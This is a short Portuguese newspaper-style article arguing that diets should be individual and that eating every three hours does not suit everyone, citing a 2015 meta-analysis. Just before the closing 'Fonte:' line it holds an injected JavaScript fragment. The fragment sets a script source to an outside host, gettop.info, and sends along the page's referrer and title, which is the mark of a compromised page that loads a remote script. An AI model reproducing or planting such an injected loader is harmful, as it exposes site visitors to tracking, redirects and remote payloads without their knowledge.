Dieta pode ser igual para todo mundo?

 

 

Acredito que a resposta vem de forma unânime na cabeça de qualquer leitor do nosso jornal: Não! Dieta não pode ser igual para todo mundo. Aqueles que nos acompanham aqui toda semana irão lembrar de vários artigos nos quais conseguimos responder essa pergunta de forma tão categórica.

Afinal, se cada um tem uma herança genética diferente e se desenvolveu em ambiente também diferente, naturalmente, precisaremos de alimentos em quantidades diferentes, proporções diferentes etc..

Uma das questões relacionadas às “regras” básicas da nutrição tem sido muito questionada nos últimos tempos. A regra de comer a cada três horas caiu por terra. E isso não quer dizer que ela não sirva para ninguém. Esse intervalo de comer a cada três horas ajuda muita gente, mas como tudo na nutrição, não serve para todo mundo.

Em uma metanálise publicada em 2015, onde os autores avaliaram 15 publicações a respeito, eles mostraram que o número de refeições não esteve relacionado à perda de peso, porém esteve, sim, relacionado à maior redução de gordura e ganho de massa magra. Alguns parâmetros não foram controlados, como a ingestão proteica ou nível de treinamento intenso. Portanto, os autores sugerem que os dados devem ser interpretados com cautela.

Comer ou não com intervalos de três horas entre as refeições são estratégias que podem ser usadas pelos nutricionistas. Essas estratégias serão adequadas a cada indivíduo após uma avaliação do mesmo em uma consulta nutricional. Então procure um nutricionista e discuta com ele qual será a melhor estratégia pra você!

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário